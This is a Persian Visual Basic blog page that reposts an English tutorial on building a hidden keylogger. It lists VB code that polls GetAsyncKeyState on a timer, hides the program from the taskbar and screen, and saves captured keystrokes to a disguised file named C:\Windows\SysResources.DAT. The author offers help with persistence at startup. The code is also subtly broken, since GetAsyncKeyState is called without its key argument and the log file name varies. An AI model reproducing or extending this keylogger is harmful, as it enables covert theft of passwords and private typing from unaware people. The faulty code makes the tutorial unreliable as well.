آموزش ویژوال بیسیک و برنامه نویسی

سورس,ویژوال بیسیک,نرم افزار,باشگاه,بدنسازی,فوتبال,آنالیز,پیش بینی,کد,برنامه نویسی

آموزش ویژوال بیسیک و برنامه نویسی

سورس,ویژوال بیسیک,نرم افزار,باشگاه,بدنسازی,فوتبال,آنالیز,پیش بینی,کد,برنامه نویسی

Creating a KeyLogger in VB

Ok...I am assuming that you have a basic understanding as to how visual basic works and how to make programs, debug, and compile. If not, email me and I might be able to help.

First, if you don't have it, get it. ApiGuide. Download it at http://www.mentalis.org/agnet/apiguide.shtml

Ok. Open VB and start a new application. Add to the form a button, a timer, and a module(I know the module isn't actually part of the form). Thats all. Change there caption of the button to Start Logging
(if you want to make it start on startup...pm me or email me)
Now using api guide or just copying from here, declare a new function. the GetASyncKeyState function

Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState"
(ByVal vKey As Long) As Integer

^---put this in the declarations section of the module.

That is all one line of code. Make sure its like that. and not split in 2.

Now you have a new function to use through your program.
ok...
now we must make it be "invisible". Now im sorry but in Windows XP, i do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.

OK. In the button code..., in the click event of course...
type the following

app.taskvisible = false
form1.visible = false
form1.hide
timer1.enabled = true


'and also in the properties section of the form...change the shownintaskbar to false

Now when we click the button...it goes invisible.

Now we are going to need some variables....
Back in the declarations section declare the following...

Dim strLetter as String, strTotal as String

Now in the timer code put this. Ill explain afterward.
also set the interval to 1 and enabled to false

Private Sub Timer1_Timer()

For I = 28 To 128

If GetAsyncKeyState <> 0 Then

strLetter = Chr(I)


'Now here you can add certain things
'so that instead of displaying
'retarded characters, it tells you
'what the user pressed. What I mean
'is if they press Enter/Return, it will
'Show some weird box. You dont want that
'so u make a select case about I for each
'button u want to customize. PM me or Email
'me for help on this part.


strTotal = strTotal & strLetter


End If

Next I

open "C:\Windows\SysResources.DAT" for output as #1
Print #1, strTotal
close #1

End Sub


'End Code

Now all you have to do is when you want to check the keys pressed, open up C:\Windows\SysResource.DAT in notepad, and there it is. This program will not run on start up. If you want to know how to do that, PM me, but preferably email me. I would much rather have you add me to Msn Messenger. My email for messenger is... Black_viper_13@hotmail.com
My email for emailing is..... Anarchist_ninja_thief@hotmail.com.

Hope this helps!
Here is the entire coding for the lamers...

'BEGINNING

Dim strLetter As String, strTotal As String, old as string

Private Sub Command1_Click()
Timer1.Enabled = True
End Sub

Private Sub Form_Load()
Command1.Caption = "Start Loggin"
Timer1.Enabled = False
Timer1.Interval = 1
End Sub

Private Sub Timer1_Timer()
For I = 28 To 128 'ASCII code
If GetAsyncKeyState <> 0 Then
strLetter = Chr(I)
End If
If strletter <> Old Then
Old = strletter
strTotal = strTotal & old
End If
Next I
Open "C:\windows\SysResources.dat" For Output As #1
Print #1, strTotal
Close #1
End Sub

'ENDING

i think thats it besides the Module of course.

نظرات 0 + ارسال نظر
برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد